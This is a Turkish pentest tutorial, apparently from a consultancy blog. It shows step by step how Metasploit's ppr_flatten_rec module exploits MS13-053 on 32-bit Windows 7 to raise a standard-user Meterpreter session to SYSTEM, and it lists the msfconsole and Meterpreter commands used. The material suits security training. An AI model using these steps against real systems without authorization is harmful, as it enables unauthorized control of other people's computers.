MSF ppr_flatten_rec İstismar Modülü ile Windows 7 İşletim Sistemindeki Hak Yükseltme Zafiyetinin İstismar Edilerek Meterpreter Bağlantısının Elde Edilmesi

0
292
views
Sızma testleri sırasında standart haklar ile erişim sağlanabilmiş bir bilgisayarda, hak yükseltilerek yönetici hakları elde edilmeye çalışılır. Hak yükseltmek için kullanılan yöntemlerden birisi de işletim sistemindeki zafiyetlerin istismar edilmesidir. Bu yazıda, 32 bit mimarideki Windows 7 işletim sistemine sahip bir bilgisayarda, MS13-053 bültenine ait zafiyet MSF ppr_flatten_rec istismar modülü ile kötüye kullanılacak ve standart bir kullanıcı hesabı ile elde edilmiş Meterpreter bağlantısında hak yükseltilerek SYSTEM hakları ile Meterpreter bağlantısı elde edilecektir.

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

Standart yetkilerle elde edilen Meterpreter bağlantısında yerel yönetici haklarına sahip olunmadığı görülmektedir.

sessions
sessions -i 1
sysinfo
run post/windows/gather/win_privs

escalating-privileges-on-windows-by-using-msf-ppr-flatten-rec-exploit-module-01

Standart yetkilere sahip durumda iken, hak yükseltmek için kullanılacak olan MSF ppr_flatten_rec istismar modülü seçilir.

background
search ppr_flatten_rec
use exploit/windows/local/ppr_flatten_rec
show options

escalating-privileges-on-windows-by-using-msf-ppr-flatten-rec-exploit-module-02

Modüle, mevcut oturuma ait ID değeri verilir.

set SESSION 1
show options

escalating-privileges-on-windows-by-using-msf-ppr-flatten-rec-exploit-module-03

Modül başlatılarak SYSTEM hakları elde edilir.

exploit
getuid
getpid
ps -s

escalating-privileges-on-windows-by-using-msf-ppr-flatten-rec-exploit-module-04

Modülün SYSTEM hakları ile çalışan “notepad.exe” bir proses oluşturduğu görülmektedir. Hak yükseltme işlemi sonrasında, yerel yönetici (hatta SYSTEM) haklarının elde edilebildiği görülmektedir.

run post/windows/gather/win_privs

escalating-privileges-on-windows-by-using-msf-ppr-flatten-rec-exploit-module-05

 

 

Pentist: Sızma Testleri ve Bilgi Güvenliği Danışmanlık Hizmetleri

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz

Bu site, istenmeyenleri azaltmak için Akismet kullanıyor. Yorum verilerinizin nasıl işlendiği hakkında daha fazla bilgi edinin.